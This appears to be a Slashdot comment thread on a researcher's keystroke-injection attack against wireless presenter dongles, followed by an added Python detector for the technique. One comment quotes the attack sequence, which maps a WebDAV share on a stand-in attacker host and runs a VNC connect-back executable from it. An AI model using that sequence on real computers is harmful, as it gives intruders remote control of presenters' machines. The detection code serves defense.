Wireless Presenters Attacked Using an Arduino
An anonymous reader writes "This week Dutch security researcher Niels Teusink described a method of attacking wireless presenter devices at an Amsterdam security conference. He had a demo showing how it is possible to use an Arduino and Metasploit to get remote code execution by sending arbitrary keystrokes to the presenter dongle. He has now released the code and made a blog post explaining how it all works. Better watch out the next time you're giving a presentation using one of these devices!"
Re:Microcontroller, not Arduino (Score:5, Informative)
Strictly speaking, Arduinos aren't microcontrollers. They're a popular hobbyist embedded platform based around the Atmel AVR microcontroller family. Much like Dells are a particular brand of computer based around x86 architecture microprocessors.
But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.
Re:Harmless (Score:2, Informative)
Re:Hacking (Score:3, Informative)
Did you RTA? He demoed getting a Metasploit payload on the system.
Re:Microcontroller, not Arduino (Score:4, Informative)
Re:Microcontroller, not Arduino (Score:3, Informative)
Well, technically, Arduinos are defined as whatever Smart Projects labels an Arduino (it's their trademark). However, yeah, Arduinos (in common usage) are defined more by their software rather than their hardware (in particular, a compatible bootloader that works with the Arduino development environment), because you don't really need much hardware to make a modern microcontroller run.
Which really just goes on to prove that there isn't anything special about Arduino at all. It's really just a bog-standard simple microcontroller breakout board (power regulator, serial I/O either via RS232 or USB, and pin headers for the micro pins) and a standard bootloader and development environment, using a slightly cooked version of C/C++ for programming (they just pre-include a header and tack on a standard main() before feeding it to GCC). Everything else is just positive feedback: Arduino is popular, so people use Arduino, so there's a large community of projects and examples and prewritten code, so Arduino becomes more popular.
I started off with microcontrollers using a crappy development board for PIC micros quite a few years back, and quickly outgrew it and have never really bothered with dev boards ever since. There isn't much of a point when you literally just feed the micro power and ground and it runs. I've built projects where the number of support components for the micro was literally zero (one, if you count the programming connector).
RTFA? (Score:5, Informative)
It's clear that you and the moderators haven't bothered to actually read the article. The research and tools used for the attack were non-trivial, and the impact is remote code execution.
Re:This is why standard protocols help (Score:3, Informative)
AFAIK, Bluetooth is license-free. That is, the protocol, and all related specifications are free for implementation.
Of course you may still need to pay a little for a chip that implements it, but the same thing goes for any wireless chip, and I doubt Bluetooth is THAT much more expensive?
Re:This is why standard protocols help (Score:5, Informative)
Whereas your average Arduino board is about $20-30 or so, an Arduino board with Bluetooth costs about $150.
http://www.sparkfun.com/commerce/tutorial_info.php?tutorials_id=148
Yes, Bluetooth is that expensive. The ArduinoBT board uses an off-the-shelf BlueGiga WT11. Newark sells those for about $60.
http://www.newark.com/bluegiga/wt11-a-ai/class-1-bluetooth-2-0-edr-module/dp/15P4005
Mind you, this is a Class 1 (i.e. long range) transmitter, using BT 2.0 and not BT 2.1. Compare this to a standard RF transmitter and receiver, which is a couple bucks per chip...
Re:RTFA? (Score:1, Informative)
Here's the super leet exploit from the article:
# [Win+R]
# net use X: http://attacker/webdavshare
# X:\VNCconnectback.exe
# [enter]
Attacker does this by sending keycode signals over RF, pretending to be the presenter's wireless remote. The hard part was reverse engineering presenter commands (he finds that replaying them works), and sniffing through channels to find the channel the presenter is using.
I'm in full agreement with the GP.
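Added example, not part of the comment above or of the researcher's released code: a defender-side heuristic for the keystroke sequence quoted in that comment, flagging a program launched from a drive letter shortly after `net use` mapped that letter to an HTTP(S) WebDAV share. The event tuples, host names, URLs and the 60-second window are constructed assumptions; real input would come from process-creation logging.

```python
import re
from datetime import datetime, timedelta

# "net use <drive>: http(s)://..." maps a WebDAV share to a drive letter.
MAP_RE = re.compile(r'^\s*net(?:\.exe)?\s+use\s+([a-z]):\s+(https?://\S+)', re.I)
# "net use <drive>: /delete" removes the mapping again.
UNMAP_RE = re.compile(r'^\s*net(?:\.exe)?\s+use\s+([a-z]):\s+/d(?:elete)?\b', re.I)
# A program launched straight from a drive letter, e.g. X:\name.exe
RUN_RE = re.compile(r'^\s*"?([a-z]):\\[^"]*?\.(?:exe|com|bat|cmd|scr)\b', re.I)

# Constructed sample events: (ISO timestamp, host, command line).
EVENTS = [
    ("2024-01-01T10:00:01", "PODIUM-PC", r"net use X: http://dav.example.test/share"),
    ("2024-01-01T10:00:03", "PODIUM-PC", r"X:\tool.exe"),
    ("2024-01-01T10:00:09", "PODIUM-PC", r"C:\Windows\System32\notepad.exe C:\notes.txt"),
    ("2024-01-01T11:00:00", "OFFICE-PC", r"net use Y: \\fileserver\reports"),
    ("2024-01-01T11:00:05", "OFFICE-PC", r"Y:\monthly.bat"),
    ("2024-01-01T12:00:00", "LAB-PC", r"net use Z: https://dav.example.test/docs"),
    ("2024-01-01T12:30:00", "LAB-PC", r"Z:\viewer.exe"),
]

def find_webdav_exec(events, window=timedelta(seconds=60)):
    """Alert when a program runs from a WebDAV-mapped drive soon after mapping."""
    mapped = {}  # (host, drive letter) -> (time mapped, share URL)
    alerts = []
    for ts, host, cmd in sorted(events):
        when = datetime.fromisoformat(ts)
        if m := MAP_RE.match(cmd):
            mapped[(host, m.group(1).upper())] = (when, m.group(2))
        elif m := UNMAP_RE.match(cmd):
            mapped.pop((host, m.group(1).upper()), None)
        elif m := RUN_RE.match(cmd):
            entry = mapped.get((host, m.group(1).upper()))
            # Only a WebDAV mapping made moments earlier counts as suspicious.
            if entry and when - entry[0] <= window:
                alerts.append({"host": host, "url": entry[1], "command": cmd,
                               "seconds_after_map": (when - entry[0]).total_seconds()})
    return alerts

if __name__ == "__main__":
    for alert in find_webdav_exec(EVENTS):
        print(alert)
```

Only the PODIUM-PC pair is flagged; the SMB mapping on OFFICE-PC and the launch 30 minutes after mapping on LAB-PC fall outside the rule.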
Re:Microcontroller, not Arduino (Score:3, Informative)
But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.
What's cool about Arduino is how it reduces development time through the use of readily available shields. So if he used any of them then it's worth mentioning and not if not (I skimmed but did not actually read the article, I didn't notice ANY of the Arduino details, but I did get momentarily flustered about the idea of owning a USBee.)
Speaking of cool stuff I could own, can anyone recommend a cheap USB JTAG with Windows and Linux support? I would accept RS232 as a second option. LPT is not eligible.
Re:This is why standard protocols help (Score:3, Informative)
Yeah, but then the maker would have to licence the technology and that adds cost. The chip used in the device doesn't come with Bluetooth. It's a very simple chip.
If there is demand, Wal-Mart will be happy to sell an unlicensed Bluetooth transmitter like the ones you can buy from DealExtreme, except in some packaging more elaborate than that usually used for crack rocks (i.e. a tiny ziploc.) That will help keep the costs down. :)
Of course, if all us nerds just tell all our non-nerd friends to stop buying the non-Bluetooth versions because they're broadcasting their passwords to the world, then a percentage of them will listen, and we can help stick a nail in the coffin of the various nonstandard devices. As much as I hate to see a proprietary, and possibly expensively licensed (who can say? it's not like they publish a fee schedule) protocol pushed all over everything, Bluetooth is the best thing around today.
Re:This is why standard protocols help (Score:3, Informative)
Hello? You can buy Bluetooth-USB-modules for as little as $3 from Amazon. And that is the price for a single item sold to a consumer. The prices of development-kit-level items are hardly comparable to the actual price to implement Bluetooth in a mass-produced gizmo.
I wonder how come you didn't find that the 433MHz wireless modems cost $40 at Sparkfun as well...
I believe a large reason, if not the largest, for not using Bluetooth in simple wireless gadgets is the amount of electricity it takes compared to a simpler custom-protocol device on the 433MHz band.
Re:This is why standard protocols help (Score:4, Informative)
Do you mean the Bluetooth USB modules used to add Bluetooth support to a PC that doesn't have it? Unfortunately, an embedded system doesn't have a desktop-class processor to run the Bluetooth stack.
Oh, and those el-cheap-o Bluetooth modules you're suggesting are probably very outdated, which is why they're so cheap. That $3 module probably cost more when it was less than a year old and they weren't trying to dump the inventory that they can't sell at a higher price...
Re:Better attack (Score:3, Informative)